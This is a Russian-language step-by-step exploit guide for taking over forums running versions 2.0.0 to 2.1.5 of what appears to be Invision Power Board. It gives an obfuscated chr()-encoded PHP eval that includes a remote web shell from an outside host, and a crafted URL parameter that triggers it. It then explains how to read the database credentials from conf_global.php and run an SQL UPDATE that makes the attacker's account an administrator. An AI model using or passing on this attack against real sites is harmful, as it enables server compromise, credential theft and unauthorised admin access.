Для форумов 2.0.0 - 2.1.5 1. Регистрируемся. 2. Отправляем сообщение : eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // (это загрузит шелл) 3. Идем в поиск. Вводим свой ник в форму "Фильтр по имени пользователя" . Ставим галку "Результаты в виде сообщений". Ищем. 4. Вставляем в конец URL- адреса &lastdate=z|eval.*?%20//)%23e%00 . Должен загрузиться шелл. 5. В конце поля "Редактировать файл" вводим /conf_global.php . Сохраняем строчки: $INFO['sql_database'] = 'имя_базы'; $INFO['sql_user'] = 'логин_админа'; $INFO['sql_pass'] = 'пароль_админа'; 6. Возвращаемся назад. 7.Спускаемся вниз. Наводим мышку на наш ник. видим "...showuser=наш_id" Запоминаем наш_id 8. Раздел "Выполнение SQL запроса" . Вводим в поле "база" имя_базы , "Логин" логин_админа , "Пароль" пароль_админа. Заместо " SHOW DATABASES; SELECT * FROM user; SELECT version(); select user(); " вводим UPDATE `ibf_members` SET `mgroup`=4 WHERE `id` =наш_id; 9. Входим в админку. Теперь мы администратор.